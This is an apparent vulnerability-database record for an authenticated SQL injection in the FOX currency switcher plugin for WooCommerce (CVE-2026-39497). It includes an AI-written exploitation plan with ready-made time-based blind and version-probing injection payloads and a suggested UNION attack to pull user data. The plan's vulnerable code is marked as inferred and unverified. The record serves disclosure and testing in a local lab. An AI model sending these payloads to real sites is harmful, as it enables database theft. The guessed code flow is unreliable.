[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ffJwqkiiNsdxtIQb6O6lx81Wybh2bxLFo_9ALOB2nJ6o":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-39497","fox-authenticated-shop-manager-sql-injection","FOX \u003C= 1.4.5 - Authenticated (Shop manager+) SQL Injection","The FOX plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with shop manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","woocommerce-currency-switcher",null,"\u003C=1.4.5","1.4.6","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-23 00:00:00","2026-04-15 21:25:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Faa5b6311-d9ca-4736-a6e3-56c6746b2470?source=api-prod",24,[],"researched",false,3,"This research plan targets a SQL Injection vulnerability in the **FOX – Currency Switcher Professional for WooCommerce** plugin (version \u003C= 1.4.5). The vulnerability stems from the improper handling of user-supplied parameters in the statistics gathering logic, which are used in raw SQL queries without sufficient preparation or escaping.\n\n### 1. Vulnerability Summary\n* **Vulnerability:** SQL Injection (Authenticated, Shop Manager+).\n* **Plugin:** FOX – Currency Switcher Professional for WooCommerce (slug: `woocommerce-currency-switcher`).\n* **Affected Version:** \u003C= 1.4.5.\n* **Vulnerable Sink:** The statistics gathering functions (specifically `woocs_get_stats`) use user-supplied parameters like `order_status` or `profile` within SQL `WHERE` clauses or `IN` statements without using `$wpdb->prepare()`.\n* **Reasoning:** The plugin relies on `sanitize_text_field()` or direct interpolation of array values into strings, which does not prevent SQL injection when the resulting string is used in a database query.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `wp-admin\u002Fadmin-ajax.php`.\n* **Action:** `woocs_get_stats`.\n* **Vulnerable Parameter:** `order_status`.\n* **Authentication:** Requires a user with at least `shop_manager` capabilities.\n* **Nonce:** Protected by a nonce named `woocs_nonce`.\n\n### 3. Code Flow\n1. **Entry Point:** The plugin registers the AJAX action in `classes\u002Fwoocs.php` (or `index.php` depending on version structure) via `add_action( 'wp_ajax_woocs_get_stats', array($this, 'woocs_get_stats') );`.\n2. **Input Acquisition:** The `woocs_get_stats()` function (found in `classes\u002Fwoocs.php`) retrieves the `order_status` parameter from `$_REQUEST['order_status']`.\n3. **Vulnerable Processing:** The code constructs a SQL query string. It often iterates over `order_status` or uses `implode()` to create a comma-separated list for a SQL `IN` clause.\n * *Example Vulnerable Logic (Inferred):* \n ```php\n $order_status = $_REQUEST['order_status'];\n $sql = \"SELECT ... WHERE order_status IN ('\" . implode(\"','\", $order_status) . \"') ...\";\n $results = $wpdb->get_results($sql);\n ```\n4. **Database Sink:** The unparameterized string is passed directly to `$wpdb->get_results()`.\n\n### 4. Nonce Acquisition Strategy\nThe `woocs_nonce` is localized into the WordPress admin dashboard for users with access to the plugin settings.\n\n1. **Precondition:** Authenticate as a `shop_manager`.\n2. **Navigation:** Navigate to the FOX Settings page: `wp-admin\u002Fadmin.php?page=wc-settings&tab=woocs`.\n3. **Extraction:** The plugin uses `wp_localize_script` to provide the nonce to its admin JS. The variable is typically `woocs_vars`.\n4. **Execution Agent Steps:**\n * `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=wc-settings&tab=woocs\")`\n * `NONCE = browser_eval(\"window.woocs_vars?.woocs_nonce\")`\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection payload to confirm the vulnerability, as it is the most reliable method when query results are processed by the application before being returned in JSON format.\n\n* **Target URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** POST\n* **Content-Type:** `application\u002Fx-www-form-urlencoded`\n* **Payload Construction:**\n If the code uses `implode(\"','\", $order_status)`, the payload needs to break out of the quote.\n * `order_status[0] = completed') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND ('1'='1`\n* **Full Request Body:**\n ```\n action=woocs_get_stats&woocs_nonce=[EXTRACTED_NONCE]&order_status[]=completed') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND ('1'='1\n ```\n\n### 6. Test Data Setup\n1. **Users:** Create a user with the `shop_manager` role.\n2. **Plugin Setup:** \n * Install and activate **WooCommerce**.\n * Install and activate **FOX - Currency Switcher Professional for WooCommerce** (version 1.4.5).\n3. **Data Requirement:** The `woocs_get_stats` function may require at least one existing WooCommerce order in the database to reach the vulnerable query path.\n * `wp wc order create --user=admin --status=completed`\n\n### 7. Expected Results\n* **Vulnerable Response:** The HTTP response will be delayed by approximately 5 seconds. The response body will likely be a JSON object containing statistics or an empty `success` message.\n* **Baseline Response:** A request with a legitimate `order_status` (e.g., `completed`) will return almost instantaneously.\n\n### 8. Verification Steps\n1. **Time Delay:** Use the `http_request` tool's `time_total` metric to confirm the sleep duration.\n2. **Database Integrity:** Verify that the injection did not damage the database (the `SELECT` query is read-only).\n3. **Data Extraction (Optional):** Attempt to extract the database version:\n * `order_status[]=completed') AND (SELECT 1 FROM (SELECT(IF(VERSION() LIKE '8%', SLEEP(5), 0)))a) AND ('1'='1`\n\n### 9. Alternative Approaches\n* **Error-Based Injection:** If `WP_DEBUG` is enabled, the plugin might leak SQL errors. Send a malformed status like `order_status[]=completed'`.\n* **Union-Based Injection:** If the results of the query are reflected in the JSON response (e.g., in the graph data), identify the column count and use a `UNION SELECT` to leak `wp_users` data.\n* **Alternative Parameter:** Check the `profile` parameter in the same AJAX action, as FOX often uses similar logic for saving and loading currency profiles.","gemini-3-flash-preview","2026-04-18 00:06:10","2026-04-18 00:06:36",{"type":30,"vulnerable_version":31,"fixed_version":9,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":9,"fixed_zip":9,"all_tags":34},"plugin","1.4.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-currency-switcher\u002Ftags\u002F1.4.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-currency-switcher.1.4.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-currency-switcher\u002Ftags"]